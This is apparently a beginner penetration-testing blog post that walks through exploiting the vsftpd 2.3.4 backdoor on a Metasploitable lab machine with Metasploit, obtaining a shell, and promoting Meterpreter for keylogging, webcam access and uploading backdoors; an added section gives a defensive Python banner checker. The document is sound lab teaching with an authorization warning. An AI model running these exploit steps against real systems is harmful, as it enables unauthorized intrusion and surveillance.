Exploitation

The exploitation phase is where we take control of the victim's machine. It can be done in many ways, but for now we will demonstrate one simple attack, and I will point you to other resources later. Before we demonstrate, let me first give you a brief meaning of vulnerability, exploit and payload.

Vulnerability - A weakness in a particular application that we can take advantage of. It is what we usually look for during information gathering.

Exploit - A piece of code that takes advantage of a vulnerability found in a particular application.

Payload - A piece of code sent along with the exploit, to be executed on the victim's machine.

Now that we have a brief understanding of vulnerabilities, exploits and payloads, let's dive in and demonstrate an attack on the vulnerability we found during our information gathering: port 21/tcp, which is an FTP (File Transfer Protocol) service.

The tool we are going to use is Metasploit.

On our attacking machine (Kali Linux), open a terminal and issue the following command:

service postgresql start && service metasploit start && msfconsole


Back in our information gathering, we found that the version running on port 21 is vsftpd 2.3.4.
Now we will search for an exploit available in Metasploit for this version. Type in the command

Then you will see something like this


As you can see, there is an exploit available for the version of FTP running on the victim's machine (Metasploitable).
Then we issue the command
use exploit/unix/ftp/vsftpd_234_backdoor
Let's take a look at the information about this exploit. Type in
info

Just scroll down to see its description.

Now that we have our exploit, let's take a look at the payloads available for it. Type in:
show payloads

Then you will see something like this


Notice the compatible payload listed. We will use it, so we type
set payload cmd/unix/interact


Now that we have our exploit and payload, let us first see all the required options that need to be filled in.
Type in:
show options


Notice that the exploit module options need RHOST to be filled in. This is where we enter the IP address of the victim's machine (Metasploitable). See the information gathering post, where the IP address of the victim's machine (Metasploitable) is 192.168.153.130.
Type in:
set RHOST 192.168.153.130
Also notice that the payload options don't require any input.
NOTE: Many of the payloads available in Metasploit require options to be filled in. You will encounter this as you practice your skills.

Now that we are all set, it's time to get wet and get our shell. Type in
exploit


As you can see, we type in
ifconfig
and notice that our IP address is now the address of the victim's machine (Metasploitable).

Let us explore the directories of the compromised machine. Just follow the commands.
We use
dir
to list the directory contents, and
cd
to change directories.


Notice that at the end of the commands we typed in
nano hackthis
because here we are going to edit the file hackthis.
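The whole attack above hinges on the version identified during information gathering (vsftpd 2.3.4 on port 21). The following added example, which is not part of the original post, is the defender's side of that step: it parses an FTP greeting (including RFC 959 multi-line "220-" replies), extracts the vsftpd version and flags the 2.3.4 build that the vsftpd_234_backdoor module targets, so you can check the FTP servers you administer before someone else does. The sample banners at the bottom are constructed, not captured from the lab machines.

```python
import re
import socket

# The build the Metasploit module vsftpd_234_backdoor targets.
BACKDOORED_VSFTPD = "2.3.4"
# vsftpd's default greeting is "220 (vsFTPd 2.3.4)"; match the name loosely.
_VSFTPD_RE = re.compile(r"vsftpd\s+v?(\d+(?:\.\d+)+)", re.IGNORECASE)


def parse_ftp_greeting(raw):
    """Return the text of the final '220 ' line of an FTP greeting, or None.

    RFC 959 multi-line replies use '220-' continuation lines and end with a
    '220 ' line, so only that last line carries the server banner.
    """
    for line in raw.splitlines():
        if line.startswith("220 "):
            return line[4:].strip()
    return None


def vsftpd_version(greeting):
    """Extract the vsftpd version string from a greeting line, or None."""
    match = _VSFTPD_RE.search(greeting or "")
    return match.group(1) if match else None


def assess_ftp_banner(raw):
    """Classify a raw greeting as backdoored / vsftpd / other / no-banner."""
    greeting = parse_ftp_greeting(raw)
    if greeting is None:
        return ("no-banner", None)
    version = vsftpd_version(greeting)
    if version is None:
        return ("other", None)
    if version == BACKDOORED_VSFTPD:
        return ("backdoored", version)
    return ("vsftpd", version)


def grab_ftp_banner(host, port=21, timeout=3.0):
    """Read the greeting from a live FTP service (network I/O, not used offline)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        return sock.recv(1024).decode("ascii", "replace")


if __name__ == "__main__":
    # Constructed sample greetings; not captured from the post's lab machines.
    for banner in ("220 (vsFTPd 2.3.4)\r\n", "220 (vsFTPd 3.0.3)\r\n",
                   "220-Welcome\r\n220 ProFTPD Server ready.\r\n", "421 Too busy\r\n"):
        print(repr(banner), "->", assess_ftp_banner(banner))
```

A "backdoored" result on a host you are responsible for means the service should be upgraded or taken offline; a version banner alone is not proof of compromise, only of exposure.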

+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

More about Exploitation.

Our demonstration may not be very interesting; you may say "is that all?", and I say "NO!". It is only meant to give you an understanding of exploitation, how to exploit and how to use the Metasploit Framework as the tool of choice. There is a lot you need to know about this, the coolest hacking/penetration testing tool if I may say so. Imagine the following:

What if you can download a file from a compromised machine?
What if you can upload a virus/backdoor to that machine?
What if you can log all the keystrokes made in that machine?
What if you can view the screenshot of that machine?
Can I turn the webcam on? wow!
Can I reboot it? hehe!

All of those "what if" and "can I" can be done. Yeah! That's right, if I'm not mistaken. Hehe! Remember the payload, the code that gets executed? There is a cutting-edge payload available in the Metasploit Framework that can make your wishes come true, called Meterpreter.

WHAT NOW?
Practice your newly acquired knowledge in exploitation. Remember that in our information gathering we discovered many open ports. TRY THEM ALL! And try to set your payload to Meterpreter as much as you can so that you can experience its power. Check out Offensive-Security's Metasploit Unleashed for more resources on how to use the Metasploit Framework.

AGAIN! AGAIN! AGAIN! Let me remind you: DO NOT EVER TRY TO HACK INTO A COMPUTER/MACHINE THAT YOU ARE NOT AUTHORIZED TO OR DO NOT OWN.
That is why Metasploitable was born.

Tools you can use for exploitation (NOTE: some are commercial):
1. Canvas
2. Core Impact
3. w3af
4. BeEF
5. Social Engineer Toolkit (SET)




Please post your comment so that I could improve my site.

Thanks

Code_in_the_Shell
